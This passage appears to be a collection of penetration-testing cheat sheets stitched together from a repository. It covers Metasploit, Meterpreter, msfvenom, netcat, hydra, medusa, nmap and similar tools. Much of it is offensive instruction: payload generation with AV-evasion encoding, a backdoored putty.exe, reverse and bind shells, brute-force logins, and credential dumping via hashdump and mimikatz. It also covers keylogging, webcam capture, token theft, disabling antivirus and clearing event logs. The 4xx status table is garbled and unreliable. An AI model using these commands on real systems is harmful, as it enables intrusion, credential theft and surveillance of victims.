Modified 25 | 301 - Moved Permanently 305 - Use Proxy 26 | 302 - Found 307 - Temporary Redirect 27 | 303 - See Other 308 - Permanent Redirect 28 | 29 | #Client Error Response Codes (4xx) 30 | 400 - Multiple Choices 410 - Not Modified 31 | 401 - Moved Permanently 411 - Use Proxy 32 | 402 - Found 412 - Temporary Redirect 33 | 403 - See Other 413 - Permanent Redirect 34 | 404 - Multiple Choices 414 - Not Modified 35 | 405 - Moved Permanently 415 - Use Proxy 36 | 406 - Found 416 - Temporary Redirect 37 | 407 - See Other 417 - Permanent Redirect 38 | 408 - Found 418 - Temporary Redirect 39 | 409 - See Other 40 | 41 | #Server Error Response Codes (5xx) 42 | 500 - Internal Server Error 508 - Loop Detected 43 | 501 - Not Implemented 509 - Bandwidth Limited 44 | 502 - Bad Gateway 510 - Not Extended 45 | 503 - Service Unavailable 511 - Network Auth Requried 46 | 504 - Gateway Timeout 550 - Permission Denied 47 | 505 - HTTP Ver Not Supported 551 - Option Not Supported 48 | 506 - Variant Also Negotiates 598 - Nework Read Timeout Error 49 | 507 - Insufficient Storage 599 - Network Connect Timeout Error -------------------------------------------------------------------------------- /https-ssl-tls: -------------------------------------------------------------------------------- 1 | #https is encrypted sessions of http 2 | -->Transport Layer Security (TLS) is used to encrypt the entire session 3 | 4 | #TLS does a handshake to ensure that the server and client can decrypt encrypted data using public keys 5 | -->creates a master key that is then used by both client and sever sessions 6 | 7 | ***if public key is knowwn, packets can be searched for the master key 8 | 9 | #SSL is the predecessor to TLS, and not used directly anymore, but TLS was built on the same framework -------------------------------------------------------------------------------- /hydra: -------------------------------------------------------------------------------- 1 | #hydra does not have a native default wordlist, using the Rockyou list is suggested 2 | 3 | #example brute force crack on ftp server 4 | hydra -t 1 -l admin -P [path to password.lst] -vV [IPaddress] ftp 5 | --> -t # = preform # tasks 6 | --> -l NAME = try to log in with NAME 7 | --> -P [filepath] = Try password 8 | --> -vV = verbose mode, showing the login+pass for each attempt 9 | 10 | #check for joe accounts by adding modifier -e s 11 | 12 | #to write found login+pass combinations to fiel, add modifier -0 [fileanme] -------------------------------------------------------------------------------- /john: -------------------------------------------------------------------------------- 1 | #To show the types of passwords that John can crack with crack speed (in cracks/second) john --test #Cracking Modes #To use your own word list (the Rockyou list is suggested) john --wordlist=[filename] [passwordfile] #Incremental mode (Brute Force) john --incremental hashfile #To show your results after running john (shows ~/.john/john.pot) john --show #Session and Restore #To restore an interrupted john session john --restore:name -------------------------------------------------------------------------------- /maltego: -------------------------------------------------------------------------------- 1 | # michael 2 | # To do a basic footprinting of a domain 3 | Machines>"Run Machine">"Footprint L1" 4 | 5 | # To do a footprinting and follow the every link of a domain 6 | Machines>"Run Machine">"Footprint L2" 7 | 8 | # To find a person's email address from a domain 9 | Machines>"Run Machine">"Person - Email Address" 10 | 11 | # To create a custom attack 12 | Machines>"New Machine" 13 | 14 | # To create a new data type 15 | Manage>"New Entity Type" 16 | 17 | # To run a transform on collected data 18 | [In the graph, right click]>"Run Transform">[Select Transform] 19 | 20 | # To create a new way to manipulate data 21 | Manage>"Local Transform" 22 | 23 | # To get latest transforms from currently set servers 24 | Manage>"Discover Transforms">"Discover Transforms" 25 | 26 | # To get transforms from specific servers 27 | Manage>"Discover Transforms">"Discover Transforms (Advanced)" 28 | -------------------------------------------------------------------------------- /markdown: -------------------------------------------------------------------------------- 1 | # andrew 2 | # I also have trouble remember markdown syntax... 3 | # headers 4 | h1 header 5 | ========= 6 | h2 header 7 | --------- 8 | 9 | # blockquotes 10 | > first level and paragraph 11 | >> second level and first paragraph 12 | > 13 | > first level and second paragraph 14 | 15 | # lists 16 | ## unordered - use *, +, or - 17 | * Red 18 | * Green 19 | * Blue 20 | 21 | ## ordered 22 | 1. First 23 | 2. Second 24 | 3. Third 25 | 26 | # code - use 4 spaces/1 tab 27 | regular text 28 | code code code 29 | or: 30 | Use the `printf()` function 31 | 32 | # hr's - three or more of the following 33 | *** 34 | --- 35 | ___ 36 | 37 | # links 38 | This is [an example](http://example.com "Title") inline link. 39 | 40 | # emphasis 41 | *em* _em_ 42 | 43 | **strong** __strong__ 44 | -------------------------------------------------------------------------------- /medusa: -------------------------------------------------------------------------------- 1 | # alex 2 | # To display all currently installed modules 3 | medusa -d 4 | 5 | # Display specific options for a module 6 | medusa -M [module_name] -q 7 | 8 | # Test all passwords in password file against the admin user on the host 9 | # 192.168.1.20 via the SMB | SSH | MySQL | HTTP service 10 | medusa -h 192.168.1.20 -u admin -P passwords.txt -M [smbnt | ssh | mssql | http] 11 | 12 | # To brute force 10 hosts and 5 users concurrently (using Medusa's parallel features) 13 | # Each of the 5 threads targeting a host will check a specific user 14 | medusa -H hosts.txt -U users.txt -P passwords.txt -T 10 -t 5 -L -F -M smbnt 15 | 16 | 17 | # Medusa allows username, password, and host data to be placed within the same file (the "combo" file). 18 | # Possible combinations in the combo file: 19 | 20 | # host:username:password 21 | # host:username: 22 | # host:: 23 | # :username:password 24 | # :username: 25 | # ::password 26 | # host::password 27 | # :id:lm:ntlm::: (PwDump files) 28 | 29 | 30 | # To test each username/password entry in the file combo.txt 31 | medusa -M smbnt -C combo.txt 32 | -------------------------------------------------------------------------------- /metasploit: -------------------------------------------------------------------------------- 1 | **Metasploit Console Basics** 2 | 3 | #Search for module: 4 | msf > search [regex] 5 | 6 | #Specify and exploit to use: 7 | msf > use exploit/[ExploitPath] 8 | 9 | #Specify a Payload to use: 10 | msf > set PAYLOAD [PayloadPath] 11 | 12 | #Show options for the current modules: 13 | msf > show options 14 | 15 | #Set options: 16 | msf > set [Option] [Value] 17 | 18 | #Start exploit: 19 | msf > exploit 20 | 21 | **Useful Auxiliary Modules ** 22 | 23 | #Port Scanner: 24 | msf > use auxiliary/scanner/portscan/tcp 25 | msf > set RHOSTS 10.10.10.0/24 26 | msf > run 27 | 28 | #DNS Enumeration 29 | msf > use auxiliary/gather/dns_enum 30 | msf > set DOMAIN target.tgt 31 | msf > run 32 | 33 | #FTP Server 34 | msf > use auxiliary/server/ftp 35 | msf > set FTPROOT /tmp/ftproot 36 | msf > run 37 | #Proxy Server 38 | msf > use auxiliary/server/socks4 39 | msf > run 40 | 41 | 42 | **msfvenom** 43 | The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode 44 | them. This tool replaces the former msfpayload and msfencode tools. Run with ‘'-l payloads’ to get a list of payloads. 45 | 46 | $ msfvenom –p [PayloadPath] 47 | –f [FormatType] 48 | LHOST=[LocalHost (if reverse conn.)] 49 | LPORT=[LocalPort] 50 | 51 | #Example 52 | Reverse Meterpreter payload as an executable and redirected into a file: 53 | 54 | $ msfvenom -p windows/meterpreter/ 55 | reverse_tcp -f exe LHOST=10.1.1.1 56 | LPORT=4444 > met.exe 57 | 58 | #Format Options (specified with –f) 59 | --help-formats – List available output formats 60 | exe – Executable 61 | pl – Perl 62 | rb – Ruby 63 | raw – Raw shellcode 64 | c – C code 65 | 66 | #Encoding Payloads with msfvenom 67 | The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' 68 | to get a list of encoders. 69 | 70 | $ msfvenom -p [Payload] -e [Encoder] -f 71 | [FormatType] -i [EncodeInterations] 72 | LHOST=[LocalHost (if reverse conn.)] 73 | LPORT=[LocalPort] 74 | 75 | #Example 76 | Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable: 77 | 78 | $ msfvenom -p windows/meterpreter/ 79 | reverse_tcp -i 5 -e x86/shikata_ga_nai -f 80 | exe LHOST=10.1.1.1 LPORT=4444 > mal.exe 81 | 82 | **Metasploit Meterpreter** 83 | 84 | #Base Commands: 85 | ? / help: Display a summary of commands exit / quit: Exit the Meterpreter session 86 | sysinfo: Show the system name and OS type 87 | shutdown / reboot: Self-explanatory 88 | 89 | #File System Commands: 90 | cd: Change directory 91 | lcd: Change directory on local (attacker's) machine 92 | pwd / getwd: Display current working directory 93 | ls: Show the contents of the directory 94 | cat: Display the contents of a file on screen 95 | download / upload: Move files to/from the target 96 | machine 97 | mkdir / rmdir: Make / remove directory 98 | edit: Open a file in the default editor (typically vi) 99 | 100 | #Process Commands: 101 | 102 | getpid: Display the process ID that Meterpreter is 103 | running inside 104 | getuid: Display the user ID that Meterpreter is 105 | running with 106 | ps: Display process list 107 | kill: Terminate a process given its process ID 108 | execute: Run a given program with the privileges 109 | of the process the Meterpreter is loaded in 110 | migrate: Jump to a given destination process ID 111 | - Target process must have same or lesser privileges 112 | - Target process may be a more stable process 113 | - When inside a process, can access any files that 114 | process has a lock on 115 | 116 | #Network Commands: 117 | ipconfig: Show network interface information 118 | portfwd: Forward packets through TCP session 119 | route: Manage/view the system's routing table 120 | 121 | #Misc Commands: 122 | idletime: Display the duration that the GUI of the 123 | target machine has been idle 124 | uictl [enable/disable] [keyboard/ 125 | mouse]: Enable/disable either the mouse or 126 | keyboard of the target machine 127 | screenshot: Save as an image a screenshot of 128 | the target machine 129 | 130 | #Additional Modules: 131 | use [module]: Load the specified module 132 | 133 | #Example: 134 | use priv: Load the priv module 135 | hashdump: Dump the hashes from the box 136 | timestomp:Alter NTFS file timestamps 137 | 138 | **Managing Sessions** 139 | 140 | #Multiple Exploitation: 141 | 142 | #Run the exploit expecting a single session that is immediately backgrounded: 143 | msf > exploit -z 144 | 145 | #Run the exploit in the background expecting one or more sessions that are immediately backgrounded: 146 | msf > exploit –j 147 | 148 | #List all current jobs (usually exploit listeners): 149 | msf > jobs –l 150 | 151 | #Kill a job: 152 | msf > jobs –k [JobID] 153 | 154 | #Multiple Sessions: 155 | 156 | #List all backgrounded sessions: 157 | msf > sessions -l 158 | 159 | #Interact with a backgrounded session: 160 | msf > session -i [SessionID] 161 | 162 | #Background the current interactive session: 163 | meterpreter > 164 | or 165 | meterpreter > background 166 | 167 | #Routing Through Sessions: 168 | 169 | All modules (exploits/post/aux) against the target 170 | subnet mask will be pivoted through this session. 171 | msf > route add [Subnet to Route To] 172 | [Subnet Netmask] [SessionID] 173 | 174 | 175 | -------------------------------------------------------------------------------- /meterpreter: -------------------------------------------------------------------------------- 1 | #Meterpreter Cheat Sheet 2 | #Jason Soto 3 | 4 | #Core Commands 5 | ? Help menu 6 | background Backgrounds the current session 7 | bgkill Kills a background meterpreter script 8 | bglist Lists running background scripts 9 | bgrun Executes a meterpreter script as a background thread 10 | channel Displays information about active channels 11 | close Closes a channel 12 | disable_unicode_encoding Disables encoding of unicode strings 13 | enable_unicode_encoding Enables encoding of unicode strings 14 | exit Terminate the meterpreter session 15 | help Help menu 16 | info Displays information about a Post module 17 | interact Interacts with a channel 18 | irb Drop into irb scripting mode 19 | load Load one or more meterpreter extensions 20 | migrate Migrate the server to another process 21 | quit Terminate the meterpreter session 22 | read Reads data from a channel 23 | resource Run the commands stored in a file 24 | run Executes a meterpreter script or Post module 25 | use Deprecated alias for 'load' 26 | write Writes data to a channel 27 | 28 | 29 | #Stdapi: File system Commands 30 | cat Read the contents of a file to the screen 31 | cd Change directory 32 | download Download a file or directory 33 | edit Edit a file 34 | getlwd Print local working directory 35 | getwd Print working directory 36 | lcd Change local working directory 37 | lpwd Print local working directory 38 | ls List files 39 | mkdir Make directory 40 | mv Move source to destination 41 | pwd Print working directory 42 | rm Delete the specified file 43 | rmdir Remove directory 44 | search Search for files 45 | upload Upload a file or directory 46 | 47 | 48 | #Stdapi: Networking Commands 49 | arp Display the host ARP cache 50 | getproxy Display the current proxy configuration 51 | ifconfig Display interfaces 52 | ipconfig Display interfaces 53 | netstat Display the network connections 54 | portfwd Forward a local port to a remote service 55 | route View and modify the routing table 56 | 57 | 58 | #Stdapi: System Commands 59 | clearev Clear the event log 60 | drop_token Relinquishes any active impersonation token. 61 | execute Execute a command 62 | getenv Get one or more environment variable values 63 | getpid Get the current process identifier 64 | getprivs Attempt to enable all privileges available to the current process 65 | getsid Get the SID of the user that the server is running as 66 | getuid Get the user that the server is running as 67 | kill Terminate a process 68 | ps List running processes 69 | reboot Reboots the remote computer 70 | reg Modify and interact with the remote registry 71 | rev2self Calls RevertToSelf() on the remote machine 72 | shell Drop into a system command shell 73 | shutdown Shuts down the remote computer 74 | steal_token Attempts to steal an impersonation token from the target process 75 | suspend Suspends or resumes a list of processes 76 | sysinfo Gets information about the remote system, such as OS 77 | 78 | 79 | #Stdapi: User interface Commands 80 | enumdesktops List all accessible desktops and window stations 81 | getdesktop Get the current meterpreter desktop 82 | idletime Returns the number of seconds the remote user has been idle 83 | keyscan_dump Dump the keystroke buffer 84 | keyscan_start Start capturing keystrokes 85 | keyscan_stop Stop capturing keystrokes 86 | screenshot Grab a screenshot of the interactive desktop 87 | setdesktop Change the meterpreters current desktop 88 | uictl Control some of the user interface components 89 | 90 | 91 | #Stdapi: Webcam Commands 92 | record_mic Record audio from the default microphone for X seconds 93 | webcam_chat Start a video chat 94 | webcam_list List webcams 95 | webcam_snap Take a snapshot from the specified webcam 96 | webcam_stream Play a video stream from the specified webcam 97 | 98 | 99 | #Priv: Elevate Commands 100 | getsystem Attempt to elevate your privilege to that of local system. 101 | 102 | 103 | #Priv: Password database Commands 104 | hashdump Dumps the contents of the SAM database 105 | 106 | 107 | #Priv: Timestomp Commands 108 | timestomp Manipulate file MACE attributes 109 | 110 | #Commands by Meterpreter extensions 111 | 112 | #Incognito Commands 113 | add_group_user Attempt to add a user to a global group with all tokens 114 | add_localgroup_user Attempt to add a user to a local group with all tokens 115 | add_user Attempt to add a user with all tokens 116 | impersonate_token Impersonate specified token 117 | list_tokens List tokens available under current user context 118 | snarf_hashes Snarf challenge/response hashes for every token 119 | 120 | 121 | #Mimikatz Commands 122 | kerberos Attempt to retrieve kerberos creds 123 | livessp Attempt to retrieve livessp creds 124 | mimikatz_command Run a custom commannd 125 | msv Attempt to retrieve msv creds (hashes) 126 | ssp Attempt to retrieve ssp creds 127 | tspkg Attempt to retrieve tspkg creds 128 | wdigest Attempt to retrieve wdigest creds 129 | 130 | 131 | #Sniffer Commands 132 | sniffer_dump Retrieve captured packet data to PCAP file 133 | sniffer_interfaces Enumerate all sniffable network interfaces 134 | sniffer_release Free captured packets on a specific interface instead of downloading them 135 | sniffer_start Start packet capture on a specific interface 136 | sniffer_stats View statistics of an active capture 137 | sniffer_stop Stop packet capture on a specific interface 138 | 139 | 140 | #Lanattacks: DHCP Commands 141 | dhcp_load_options Load DHCP optionis from a datastore 142 | dhcp_log Log DHCP server activity 143 | dhcp_reset Reset the DHCP server 144 | dhcp_set_option Set a DHCP server option 145 | dhcp_start Start the DHCP server 146 | dhcp_stop Stop the DHCP server 147 | 148 | 149 | #Lanattacks: TFTP Commands 150 | tftp_add_file Add a file to the TFTP server 151 | tftp_reset Reset the TFTP server 152 | tftp_start Start the TFTP server 153 | tftp_stop Stop the TFTP server 154 | 155 | 156 | #Espia Commands 157 | screengrab Attempt to grab screen shot from process's active desktop 158 | 159 | 160 | #Examples 161 | #Migrate to a given process ID 162 | 163 | meterpreter > migrate 1450 164 | 165 | #Load meterpreter extension 166 | 167 | meterpreter > load mimikatz 168 | meterpreter > load incognito 169 | 170 | #Get info on a Post Module 171 | 172 | meterpreter > info [post_module] 173 | 174 | #Privilege Escalation 175 | 176 | meterpreter > use priv 177 | meterpreter > getsystem 178 | meterpreter > getuid 179 | 180 | #Steal Token 181 | meterpreter > steal_token [user PID] 182 | 183 | #Example 184 | meterpreter > steal_token 420 185 | 186 | #Token Impersonation 187 | meterpreter > use incognito 188 | meterpreter > list_tokens -u 189 | meterpreter > impersonate_token DOMAIN\User 190 | 191 | #Attempt to create user on Domain Controller 192 | meterpreter > add_user newuser password -h 192.168.20.30 193 | 194 | #Use Meterpreter Session to Pivot onto other Systems 195 | 196 | meterpreter > run get_local_subnets 197 | meterpreter > background 198 | msf exploit(handler) > route add [session]run 199 | 200 | #run Post modules 201 | meterpreter > run [postmodule] 202 | 203 | #Example 204 | meterpreter > run killav 205 | meterpreter > run hashdump 206 | meterpreter > run persistence 207 | 208 | #See all post modules you can run 209 | meterpreter > run 210 | 211 | #Attempt to retrieve Kerberos o Livessp credentials 212 | meterpreter > load mimikatz 213 | meterpreter > kerberos 214 | meterpreter > livessp 215 | 216 | 217 | -------------------------------------------------------------------------------- /msfvenom: -------------------------------------------------------------------------------- 1 | #MSFVenom CheatSheet 2 | #Jason Soto 3 | 4 | #Basic Syntax 5 | msfvenom [options] 6 | 7 | #Options 8 | 9 | -p, --payload Payload to use. Specify a '-' or stdin to use custom payloads 10 | -l, --list [module_type] List a module type example: payloads, encoders, nops, all 11 | -n, --nopsled Prepend a nopsled of [length] size on to the payload 12 | -f, --format Output format (use --help-formats for a list) 13 | -e, --encoder [encoder] The encoder to use 14 | -a, --arch The architecture to use 15 | --platform The platform of the payload 16 | -s, --space The maximum size of the resulting payload 17 | -b, --bad-chars The list of characters to avoid example: '\x00\xff' 18 | -i, --iterations The number of times to encode the payload 19 | -c, --add-code Specify an additional win32 shellcode file to include 20 | -x, --template Specify a custom executable file to use as a template 21 | -k, --keep Preserve the template behavior and inject the payload as a new thread 22 | --payload-options List the payload's standard options 23 | -o, --out Save the payload 24 | -v, --var-name Specify a custom variable name to use for certain output formats 25 | -h, --help Show this message 26 | --help-formats List available formats 27 | 28 | # Format Options (Specified with -f) 29 | #Executable formats 30 | asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war 31 | 32 | #Transform formats 33 | bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript 34 | 35 | #Creating a Payload 36 | $ msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport] 37 | 38 | #Example 39 | $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.20 LPORT=443 -f exe -o exepayload.exe 40 | 41 | #Check payload options 42 | $ msfvenom -p [payload] --payload-options 43 | 44 | Example 45 | $ msfvenom -p windows/meterpreter/reverse_tcp --payload-options 46 | 47 | #Encoding a Payload 48 | $ msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile 49 | 50 | #Encoders available 51 | 52 | #Framework Encoders 53 | 54 | Name Rank Description 55 | ---- ---- ----------- 56 | cmd/echo good Echo Command Encoder 57 | cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder 58 | cmd/ifs low Generic ${IFS} Substitution Command Encoder 59 | cmd/perl normal Perl Command Encoder 60 | cmd/powershell_base64 excellent Powershell Base64 Command Encoder 61 | cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder 62 | generic/eicar manual The EICAR Encoder 63 | generic/none normal The "none" Encoder 64 | mipsbe/byte_xori normal Byte XORi Encoder 65 | mipsbe/longxor normal XOR Encoder 66 | mipsle/byte_xori normal Byte XORi Encoder 67 | mipsle/longxor normal XOR Encoder 68 | php/base64 great PHP Base64 Encoder 69 | ppc/longxor normal PPC LongXOR Encoder 70 | ppc/longxor_tag normal PPC LongXOR Encoder 71 | sparc/longxor_tag normal SPARC DWORD XOR Encoder 72 | x64/xor normal XOR Encoder 73 | x86/add_sub manual Add/Sub Encoder 74 | x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder 75 | x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder 76 | x86/avoid_underscore_tolower manual Avoid underscore/tolower 77 | x86/avoid_utf8_tolower manual Avoid UTF8/tolower 78 | x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder 79 | x86/call4_dword_xor normal Call+4 Dword XOR Encoder 80 | x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder 81 | x86/context_stat manual stat(2)-based Context Keyed Payload Encoder 82 | x86/context_time manual time(2)-based Context Keyed Payload Encoder 83 | x86/countdown normal Single-byte XOR Countdown Encoder 84 | x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder 85 | x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder 86 | x86/nonalpha low Non-Alpha Encoder 87 | x86/nonupper low Non-Upper Encoder 88 | x86/opt_sub manual Sub Encoder (optimised) 89 | x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder 90 | x86/single_static_bit manual Single Static Bit 91 | x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder 92 | x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder 93 | 94 | #Example 95 | $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.40 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload.exe 96 | 97 | $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe 98 | 99 | #Example 100 | #Remove Bad Characters 101 | $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -b ‘\x00′ -f exe -o payload.exe 102 | 103 | #Creating a Payload using a template 104 | msfvenom -p [payload] -x [template] -f [formattype] > outputfile 105 | 106 | #Example 107 | #Creating executable payload using putty.exe as template 108 | $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -x putty.exe -f exe > evilputty.exe 109 | 110 | 111 | 112 | -------------------------------------------------------------------------------- /mysql: -------------------------------------------------------------------------------- 1 | # alex 2 | # To connect to a database 3 | mysql -h localhost -u root -p 4 | 5 | # To backup all databases 6 | mysqldump --all-databases --all-routines -u root -p > ~/fulldump.sql 7 | 8 | # To restore all databases 9 | mysql -u root -p < ~/fulldump.sql 10 | 11 | # To create a database in utf8 charset 12 | CREATE DATABASE owa CHARACTER SET utf8 COLLATE utf8_general_ci; 13 | 14 | # Types of user permissions: 15 | 16 | # ALL PRIVILEGES - gives user full unrestricted access 17 | # CREATE - allows user to create new tables or databases 18 | # DROP - allows user to delete tables or databases 19 | # DELETE - allows user to delete rows from tables 20 | # INSERT- allows user to insert rows into tables 21 | # SELECT- allows user to use the Select command to read through databases 22 | # UPDATE- allow user to update table rows 23 | # GRANT OPTION- allows user to grant or remove other users' privileges 24 | 25 | # To grant specific permissions to a particular user 26 | GRANT permission_type ON database_name.table_name TO 'username'@'hostname'; 27 | 28 | # To add a user and give rights on the given database 29 | GRANT ALL PRIVILEGES ON database.* TO 'user'@'localhost'IDENTIFIED BY 'password' WITH GRANT OPTION; 30 | 31 | # To change the root password 32 | SET PASSWORD FOR root@localhost=PASSWORD('new_password'); 33 | 34 | # To delete a database 35 | DROP DATABASE database_name; 36 | 37 | # To reload privileges from MySQL grant table 38 | FLUSH PRIVILEGES; 39 | 40 | # Show permissions for a particular user 41 | SHOW GRANTS FOR 'username'@'hostname'; 42 | 43 | # Find out who the current user is 44 | SELECT CURRENT_USER(); 45 | 46 | # To delete a table in the database 47 | DROP TABLE table_name; 48 | 49 | #To return all records from a particular table 50 | SELECT * FROM table_name; 51 | 52 | # To create a table (Users table used as example) 53 | # Note: Since username is a primary key, it is NOT NULL by default. Email is optional in this example. 54 | CREATE TABLE Users ( 55 | username VARCHAR(80), 56 | password VARCHAR(80) NOT NULL, 57 | email VARCHAR(80), 58 | PRIMARY KEY (username) 59 | ); 60 | 61 | # To disable general logging 62 | set global general_log=0; 63 | -------------------------------------------------------------------------------- /ncat: -------------------------------------------------------------------------------- 1 | # andrew 2 | # Connect mode (ncat is client) | default port is 31337 3 | ncat [] 4 | 5 | # Listen mode (ncat is server) | default port is 31337 6 | ncat -l [] [] 7 | 8 | # Transfer file (closes after one transfer) 9 | ncat -l [] [] < file 10 | 11 | # Transfer file (stays open for multiple transfers) 12 | ncat -l --keep-open [] [] < file 13 | 14 | # Receive file 15 | ncat [] [] > file 16 | 17 | # Brokering | allows for multiple clients to connect 18 | ncat -l --broker [] [] 19 | 20 | # Listen with SSL | many options, use ncat --help for full list 21 | ncat -l --ssl [] [] 22 | 23 | # Access control 24 | ncat -l --allow 25 | ncat -l --deny 26 | 27 | # Proxying 28 | ncat --proxy [:] --proxy-type {http | socks4} [] 29 | 30 | # Chat server | can use brokering for multi-user chat 31 | ncat -l --chat [] [] 32 | -------------------------------------------------------------------------------- /nessus: -------------------------------------------------------------------------------- 1 | # Jose Moruno Cadima <@sniferl4bs> 2 | #Nessus 3 | #SERVER 4 | nessusd [–c config-file] [-a address] [-p port-number] [-D] [-d] 5 | -c -a 6 | -p -D (daemon mode) 7 | -v (version info) -h (help) 8 | -d (dumps compilation options) 9 | 10 | #CLIENT 11 | nessus [-v][-h][-n][-T ][-q [-pPS] host port user password targets results 12 | -c -q (quiet/batch mode) 13 | -p (obtain plugin-list) -P (obtain plugin preferences) 14 | -S (SQL output for -p and -P) -V (verbose) 15 | -x (don’t check SSL certs) -v (version) 16 | -h (help) -n (no-pixmaps) 17 | 18 | #Server connection parameters 19 | Host: IP of nessusd server 20 | Port: Port on which nessusd server is running (default 1241) 21 | User: User name to use for connecting to nessusd. 22 | Password: Login credentials 23 | 24 | #Output format 25 | -T nbe -T html -T html 26 | _graph 27 | -T text -T xml -T old-xml 28 | -T tex -T nsr 29 | 30 | #Example 31 | nessus –qa –T nbe 127.0.0.1 1241 john d03 targets.txt results.nbe 32 | 33 | #Report Conversion 34 | nessus -i in.[nsr|nbe] -o out.[html|xml|nsr|nbe] 35 | -------------------------------------------------------------------------------- /netcat: -------------------------------------------------------------------------------- 1 | # Netcat Cheat Sheet 2 | # Jose Moruno Cadima 3 | 4 | #Transfering a File 5 | nc -lvp 4444 > output.txt #Recei 6 | nc -nv < input.txt #Send 7 | 8 | #Netcat Bind Shell (Windows) 9 | nc -lvp 4444 -e cmd.exe 10 | nc -nv 4444 #Connect to the shell 11 | 12 | #Netcat Bind Shell (Linux) 13 | nc -lvp 4444 -e /bin/sh 14 | nc -nv 4444 #Connect to the shell 15 | 16 | #Netcat Reverse Shell (Windows) 17 | nc -lvp 443 # Listening for connection 18 | nc -nv 443 -e cmd.exe 19 | 20 | #Netcat Reverse Shell (Linux) 21 | nc -lvp 443 22 | nc -nv 443 -e /bin/sh 23 | 24 | #Netcat - Port Scanner 25 | nc -z 26 | 27 | #Netcat Banner Grabbing 28 | echo "" | nc -nv -w1 29 | -------------------------------------------------------------------------------- /nikto: -------------------------------------------------------------------------------- 1 | # alex 2 | # Contributor: Jose Moruno Cadima 3 | 4 | # To scan a particular host 5 | nikto.pl -host [host IP/name] 6 | 7 | # To scan a host on multiple ports (default = 80) 8 | nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3] 9 | 10 | # To scan a host and output fingerprinted information to a file 11 | nikto.pl -host [host IP/name] -output [output_file] 12 | 13 | # To use a proxy while scanning a host 14 | nikto.pl -host [host IP/name] -useproxy [proxy address] 15 | 16 | #Display Options -Display 17 | 18 | 1 Show redirects 19 | 2 Show cookies received 20 | 3 Show all 200/OK responses 21 | 4 Show URLs which require authentication 22 | D Debug output 23 | E Display all HTTP errors 24 | 25 | 26 | -------------------------------------------------------------------------------- /nmap: -------------------------------------------------------------------------------- 1 | # Nmap Cheat Sheet 2 | #Jose Moruno Cadima 3 | 4 | #Basic Syntax 5 | nmap [ScanType] [Options] {targets} 6 | 7 | #Target Specification 8 | IPv4 address: 192.168.1.1 9 | IPv6 address: AABB:CCDD::FF:: 10 | Host name: www.sniferl4bs.com 11 | IP address range: 192.168.0-255 12 | Use file with lists of targets: -iL 13 | 14 | 15 | #Target Ports 16 | No port range specified scans 1,000 most popular ports 17 | 18 | -F Scan 100 most popular ports 19 | -p- Port range 20 | -p,,... Port List 21 | --top-ports Scan n most popular ports 22 | 23 | #Scan Types 24 | 25 | -O OS Detection 26 | -sP Probe only host live scan 27 | -sS SYN Scan 28 | -sT TCP Connect Scan 29 | -sU UDP Scan 30 | -sV Version Scan 31 | 32 | #Output Formats 33 | 34 | -oN Standard Nmap output 35 | -oX XML format 36 | 37 | #Timing Options 38 | 39 | -T0 Paranoid: Very slow, used for IDS evasion 40 | -T1 Sneaky: Quite slow, used for IDS evasion 41 | -T2 Polite: Slows down to consume less 42 | bandwidth, runs ~10 times slower than 43 | default 44 | -T3 Normal: Default, a dynamic timing model 45 | based on target responsiveness 46 | -T4 Aggressive: Assumes a fast and reliable 47 | network and may overwhelm targets 48 | -T5 Insane: Very aggressive; will likely 49 | overwhelm targets or miss open ports 50 | -------------------------------------------------------------------------------- /nping: -------------------------------------------------------------------------------- 1 | # alexbujduveanu 2 | 3 | # To perform a TCP connect() (handshake) with a host 4 | nping --tcp-connect [target host] 5 | 6 | # To perform a TCP connect() 7 | nping --tcp-connect [target host] [target host] [target host] 8 | 9 | # To attempt a TCP handshake on a port range (1-80) 10 | nping --tcp-connect [target host] -p1-80 -c 1 11 | 12 | # To send a UDP packet with 50 bytes of random data (to port 53 in this example) 13 | nping --udp [target host] -p 53 --data-length 100 14 | 15 | # Send 500 TCP packets at a rate of 50 packets per second 16 | nping --tcp [target host] --rate 50 -c 500 17 | 18 | # To send an ARP request to a particular host 19 | ping --arp [target host] 20 | 21 | # To send ARP requests to all hosts in the 192.168.1.0/24 network 22 | nping --arp 192.168.1.0/24 23 | 24 | # To send an ICMP echo request 25 | nping [target host] --icmp --icmp-type echo 26 | 27 | # To send an ICMP echo reply 28 | nping google.com --icmp --icmp-type echo-reply 29 | 30 | # To send a packet with a bad checksum from port 1221 to port 80 31 | nping --udp --badsum --source-port 1221 -p 80 [target host] 32 | 33 | # To toggle how verbose the output should be, simply append '-v ' followed by an integer between -4 (no output) and 4 (very verbose) 34 | -------------------------------------------------------------------------------- /permissions: -------------------------------------------------------------------------------- 1 | # andrew 2 | # file permissions 3 | - rw- r-- r-- 4 | filetype u-permissions g-permissions o-permissions 5 | 6 | # file properties 7 | 1 root root 1845 